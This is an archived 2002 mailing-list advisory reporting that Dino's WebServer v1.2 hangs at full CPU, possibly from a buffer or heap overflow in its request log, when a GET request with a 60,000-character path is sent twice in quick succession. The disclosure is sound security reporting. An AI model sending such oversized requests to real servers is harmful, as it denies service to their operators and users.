Dino's WebServer v1.2 is vulnerable to a Denial of Service attack with a possible buffer overflow or heap overflow. Explanation: Given a series of requests the server will hang at 99% CPU. To Dino's (actually, Anders G. Jensen) credit, the priority is low enough that other programs appear to be taxed little by the CPU usage. The server cannot handle other requests and must be restarted. The server does not appear to recover automatically: after 10 minutes of my CPU running at almost 100%, I killed the program. It is my belief that the server may have a heap or buffer overflow. Usually the server handles long path names without problem, or so it seems. Dino's WebServer has a feature that allows the user to see the GET requests as they present themselves. The software contains a Log tag with a window. Almost every GET request is copied into this window. Since the application copies the request string the possibility exists that this copying leads to an overflow, and also the hang. Tested on: Windows 2000 Pro SP1 Windows NT4.0 Work SP6 (clean install) Exploit: Please read carefully: The server does *not* hang if one sends a *single* request as follows: GET /<60,000 A's> HTTP/1.0 The server *will* hang if this request is sent at least twice within the period of 1 or 2 seconds. I've played with smaller buffer sizes with mixed results. Dino was not contacted.(I could not find an email address.) 'ken'@FTU -- "I grew convinced that truth, sincerity and integrity in dealings between man and man were of the utmost importance to the felicity of life, and I formed a written resolution to practise them ever while I lived." -Benjamin Franklin, The Autobiography of Benjamin Franklin
This archive was generated by hypermail 2b30 : Tue Feb 19 2002 - 15:38:17 PST